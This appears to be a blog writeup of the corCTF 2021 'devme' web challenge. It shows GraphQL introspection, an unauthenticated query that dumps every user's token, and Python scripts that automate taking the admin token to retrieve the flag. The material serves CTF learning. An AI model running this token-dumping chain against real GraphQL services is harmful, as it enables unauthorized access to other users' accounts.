devme corCTF Web challenge writeup

Hello guys, back again with another tutorial. This time I'm going to show you how I solved the devme challenge from corCTF 2021. You are given a web page, and manual enumeration reveals it is running GraphQL under the hood. When the GraphQL endpoint is passed an email address it creates a user whose username is a sha256 hash. We later find that the schema exposes three operations:

  1. A mutation that adds a user to the database
  2. A users query that returns every user's username and token
  3. A flag query that takes a token and returns the flag

Without further ado, let's jump in.

We have been given the following URL

https://devme.be.ax/

On opening we get a standard web page

The first enumerations that I usually run are

  1. A directory brute force using gobuster (you can use ffuf, feroxbuster or even wfuzz, depending on your liking)
  2. A vulnerability scan using nikto

While they were running I decided to poke at the website and see what functionality it had.

The web application allows a user to sign up to get a free preview of a book.

So I decided to sign up using a fake email address to see what the form actually did, and intercepted the request using Burp Suite.

Looking at the screenshot of the intercepted request we see a couple of interesting things.

The website has a GraphQL endpoint, and it is using a mutation operation to create a user from the email address the visitor supplies. Mutations are the GraphQL operations that modify back-end data (unlike queries, which only read it); in our case the operation adds a user to the backend system.

The created user has a sha256 hash as its username.

The next thing to do is query the schema to see how much functionality we have. Here I'm going to show a really awesome tool that does the tedious work for you and lists the operations you are allowed to perform against the GraphQL API. The tool is called graphql-playground.

First download the AppImage from GitHub, make it executable and launch it from your terminal.

Once the application has opened, click on "URL endpoint".

Then input the graphql endpoint URL and click open

A new window will open where you can run your queries
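What graphql-playground is doing behind that schema tab is sending a standard introspection query and rendering the result. The script below is an added example (it is neither the challenge's code nor graphql-playground's) that sends the same introspection query as the JSON body {"query": INTROSPECTION_QUERY} and reduces the response to a list of root queries and mutations with their argument and return types. The exact endpoint path is not given on the page, so it is not hard-coded here; SAMPLE_INTROSPECTION is constructed to match what this writeup reports (users and flag queries plus a user-adding mutation), and the mutation's field name createUser is an assumption.

```python
"""List the operations a GraphQL API exposes, from its introspection result.

Added example; this is neither the challenge's code nor graphql-playground's.
INTROSPECTION_QUERY is what you POST as {"query": ...} to the endpoint (its
path is not given on the page). SAMPLE_INTROSPECTION is constructed to match
what the writeup reports; the mutation name 'createUser' is an assumption.
"""

# The standard introspection query: the root operation types plus each root
# field's arguments and return type, unwrapping NON_NULL/LIST three levels deep.
INTROSPECTION_QUERY = """
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    types {
      name kind
      fields {
        name
        args { name type { ...TypeRef } }
        type { ...TypeRef }
      }
    }
  }
}
fragment TypeRef on __Type {
  kind name
  ofType { kind name ofType { kind name ofType { kind name } } }
}
"""


def render_type(t):
    """Rebuild SDL syntax such as [User!]! from a nested TypeRef dict."""
    if t["kind"] == "NON_NULL":
        return render_type(t["ofType"]) + "!"
    if t["kind"] == "LIST":
        return "[" + render_type(t["ofType"]) + "]"
    return t["name"]


def summarize_schema(introspection):
    """Map 'query' and 'mutation' to the signatures of their root fields."""
    schema = introspection["data"]["__schema"]
    types = {t["name"]: t for t in schema["types"]}
    summary = {}
    for key in ("queryType", "mutationType"):
        root = schema.get(key)
        if not root:  # e.g. a read-only API that defines no Mutation type
            continue
        signatures = []
        for field in types[root["name"]].get("fields") or []:
            args = ", ".join(f"{a['name']}: {render_type(a['type'])}"
                             for a in field["args"])
            signatures.append(f"{field['name']}({args}): {render_type(field['type'])}")
        summary[key[:-len("Type")]] = signatures
    return summary


# Helpers to build TypeRef dicts for the constructed sample below.
def _named(kind, name):
    return {"kind": kind, "name": name, "ofType": None}


def _non_null(inner):
    return {"kind": "NON_NULL", "name": None, "ofType": inner}


def _list(inner):
    return {"kind": "LIST", "name": None, "ofType": inner}


# Constructed introspection response shaped like the challenge schema as the
# writeup describes it. 'createUser' is an assumed name for the mutation.
SAMPLE_INTROSPECTION = {"data": {"__schema": {
    "queryType": {"name": "Query"},
    "mutationType": {"name": "Mutation"},
    "types": [
        {"name": "Query", "kind": "OBJECT", "fields": [
            {"name": "users", "args": [], "type": _list(_named("OBJECT", "User"))},
            {"name": "flag",
             "args": [{"name": "token", "type": _non_null(_named("SCALAR", "String"))}],
             "type": _named("SCALAR", "String")},
        ]},
        {"name": "Mutation", "kind": "OBJECT", "fields": [
            {"name": "createUser",
             "args": [{"name": "email", "type": _non_null(_named("SCALAR", "String"))}],
             "type": _named("OBJECT", "User")},
        ]},
        {"name": "User", "kind": "OBJECT", "fields": [
            {"name": "username", "args": [], "type": _named("SCALAR", "String")},
            {"name": "token", "args": [], "type": _named("SCALAR", "String")},
        ]},
    ],
}}}

if __name__ == "__main__":
    for op, sigs in summarize_schema(SAMPLE_INTROSPECTION).items():
        print(op)
        for sig in sigs:
            print("  " + sig)
```

If introspection has been disabled on the server, the same POST returns an error instead of a schema, and enumeration falls back to guessing field names; on this challenge it was enabled, which is exactly why the playground could draw the schema for us.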

Looking at the schema we can run the three operations I described above.

First I ran the users operation and queried the API for the username and token of every user.

The query that i used was

query{users{username, token}}

Looking at the screenshot below, I was able to dump all the usernames with their respective tokens. Note that this query needed no authentication at all.

We are only interested in the admin's token, since it is the one that will give us the flag.

Next I ran the second query, which retrieves the flag. The query used was

query{flag(token:"3cd3a50e63b3cb0a69cfb7d9d4f0ebc1dc1b94143475535930fa3db6e687280b")}

And looking at the screenshot below we are able to retrieve the flag,

which is

corctf{ex_g00g13_3x_fac3b00k_t3ch_l3ad_as_a_s3rvice}
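The two playground queries above can be scripted so the same chain (dump users, single out the admin, redeem the token) runs in one go. This is an added example and not the author's code. Its sample responses are constructed from what the writeup reports (self-registered users get a sha256 hex username; the admin token and flag are the ones shown above). Two things are assumptions about the challenge data: that the admin row is the user literally named admin, or failing that the only user whose username is not a sha256 digest; and what the server actually hashes to make the username, which the page does not say.

```python
"""Script the two queries from the walkthrough: dump users, pick the admin,
fetch the flag with the admin token.

Added example, not the author's code. Sample responses are constructed from
what the writeup reports. That the admin row is the user named 'admin', or
the lone user whose username is not a sha256 digest, is an assumption.
"""
import hashlib
import json
import re
import urllib.request

SHA256_HEX = re.compile(r"^[0-9a-f]{64}$")
FLAG_RE = re.compile(r"corctf\{[^}]*\}")

USERS_QUERY = "query { users { username token } }"
# Pass the token as a GraphQL variable rather than splicing it into the query
# text, so a token containing quotes or braces cannot break or alter the query.
FLAG_QUERY = "query GetFlag($token: String!) { flag(token: $token) }"


def graphql_request(query, variables=None):
    """JSON body for a GraphQL POST, as seen in the intercepted signup request."""
    body = {"query": query}
    if variables:
        body["variables"] = variables
    return body


def post_graphql(endpoint, query, variables=None, timeout=10):
    """Send one request over HTTP. Only used by run(); never exercised offline."""
    data = json.dumps(graphql_request(query, variables)).encode()
    req = urllib.request.Request(endpoint, data=data,
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.load(resp)


def admin_candidates(users_response):
    """Users that did not come through the signup form: username not a sha256 digest."""
    return [u for u in users_response["data"]["users"]
            if not SHA256_HEX.match(u["username"])]


def pick_admin_token(users_response):
    """Prefer a user literally called 'admin'; otherwise the lone non-hash user."""
    cands = admin_candidates(users_response)
    for u in cands:
        if u["username"].lower() == "admin":
            return u["token"]
    if len(cands) == 1:
        return cands[0]["token"]
    raise ValueError("cannot single out admin among %r" % [u["username"] for u in cands])


def extract_flag(flag_response):
    """Pull the flag out of a flag query response, surfacing GraphQL errors."""
    if flag_response.get("errors"):
        raise RuntimeError(flag_response["errors"])
    m = FLAG_RE.search(flag_response["data"].get("flag") or "")
    if not m:
        raise ValueError("no corctf{...} flag in response")
    return m.group(0)


def run(endpoint):
    """End-to-end against a live endpoint (network); endpoint is the GraphQL URL."""
    token = pick_admin_token(post_graphql(endpoint, USERS_QUERY))
    return extract_flag(post_graphql(endpoint, FLAG_QUERY, {"token": token}))


# Constructed sample data: one self-registered user whose username is a sha256
# digest (of what, the page does not say; the fake email is just a stand-in)
# with a made-up token, and the admin row carrying the token quoted above.
SAMPLE_USERS = {"data": {"users": [
    {"username": hashlib.sha256(b"fake@example.com").hexdigest(),
     "token": hashlib.sha256(b"constructed-token").hexdigest()},
    {"username": "admin",
     "token": "3cd3a50e63b3cb0a69cfb7d9d4f0ebc1dc1b94143475535930fa3db6e687280b"},
]}}
SAMPLE_FLAG = {"data": {"flag": "corctf{ex_g00g13_3x_fac3b00k_t3ch_l3ad_as_a_s3rvice}"}}

if __name__ == "__main__":
    token = pick_admin_token(SAMPLE_USERS)
    print(json.dumps(graphql_request(FLAG_QUERY, {"token": token})))
    print(extract_flag(SAMPLE_FLAG))
```

The sha256 filter is only a heuristic for this challenge's data; against a real target you would confirm which account is privileged from the schema or the application rather than from the shape of the username.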

And that's it for the challenge. The bug here is an authorization one rather than anything exotic: the users query hands every user's token, the admin's included, to an unauthenticated client, and with introspection enabled we could discover that query instead of guessing it. This tutorial only touched the basics of GraphQL; I have seen SQL injection, command injection and more exploited through GraphQL, so take the time to read up on it. But till next time, it's goodbye. If you liked the walkthrough don't forget to clap for me down below and follow me so that you won't miss any upcoming walkthroughs.

Penetration Tester/Analytical Chemist who Loves Cybersecurity. GitHub(https://github.com/musyoka101), ExploitDB(https://www.exploit-db.com/?author=10517)